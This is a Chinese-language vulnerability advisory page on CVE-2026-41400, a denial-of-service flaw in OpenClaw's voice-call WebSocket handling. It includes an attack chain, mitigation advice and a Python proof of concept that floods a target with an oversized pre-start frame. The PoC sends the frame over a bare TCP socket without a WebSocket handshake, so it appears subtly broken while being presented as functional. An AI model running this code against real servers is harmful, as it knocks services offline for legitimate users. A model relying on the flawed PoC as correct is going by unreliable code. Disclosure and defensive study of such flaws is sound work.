IPBUF安全漏洞报告
English
CVE-2026-41400 CVSS 5.3 中危

CVE-2026-41400 OpenClaw资源耗尽漏洞

披露日期: 2026-04-28

漏洞信息

漏洞编号
CVE-2026-41400
漏洞类型
拒绝服务
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

DoS拒绝服务OpenClawWebSocket资源耗尽CVE-2026-41400

漏洞概述

OpenClaw 2026.3.31之前的版本存在安全漏洞,这是针对CVE-2026-32062的不完整修复。由于语音通话组件在启动验证前解析大型WebSocket帧,远程攻击者可发送超大型预启动帧导致资源消耗和拒绝服务。

技术细节

该漏洞源于OpenClaw在修复CVE-2026-32062时未能彻底解决WebSocket帧处理的安全问题,属于不完整修复导致的漏洞。具体而言,受影响的语音通话组件在处理WebSocket连接时存在逻辑缺陷:组件会在执行严格的启动状态验证之前,优先解析并处理传入的WebSocket帧数据。攻击者无需任何身份认证,即可通过网络远程向目标服务器发送特制的超大型“预启动”WebSocket帧。由于系统在确认合法性之前就分配资源来解析这些数据,导致服务器内存和CPU资源被迅速耗尽。这种资源耗尽最终导致服务响应迟缓或完全崩溃,形成拒绝服务攻击。

攻击链分析

STEP 1
侦察
攻击者识别网络上运行OpenClaw且版本低于2026.3.31的目标服务器。
STEP 2
漏洞利用
攻击者向目标服务器的语音通话组件端口发送特制的超大型WebSocket数据帧,利用其在验证前解析的逻辑缺陷。
STEP 3
资源耗尽
服务器在未验证请求合法性的情况下尝试解析巨型帧,导致内存和CPU资源被耗尽。
STEP 4
拒绝服务
由于资源耗尽,OpenClaw服务停止响应或崩溃,导致合法用户无法访问服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket import struct def send_oversized_websocket_frame(host, port): # Construct a WebSocket frame with a huge payload # FIN=1, Opcode=0x1 (Text), Masked=1, Payload Length=127 (Extended) payload = b"A" * 10000000 # 10MB payload payload_len = len(payload) header = b"\x81" # FIN + Text frame if payload_len < 126: header += bytes([0x80 | payload_len]) elif payload_len < 65536: header += b"\xfe" + struct.pack(">H", payload_len) else: header += b"\xff" + struct.pack(">Q", payload_len) # Add masking key (all zeros for simplicity in PoC) header += b"\x00\x00\x00\x00" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) # Send the frame immediately upon connection (Pre-start) s.send(header + payload) print("[+] Oversized frame sent to %s:%d" % (host, port)) s.close() except Exception as e: print("[-] Error: %s" % e) if __name__ == "__main__": target_host = "192.168.1.100" target_port = 8080 send_oversized_websocket_frame(target_host, target_port)

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施
建议在应用层或网络层限制WebSocket帧的最大长度,并确保在解析任何数据帧之前完成严格的身份验证和启动状态检查。对于无法立即升级的系统,建议通过防火墙规则限制对语音组件端口的访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表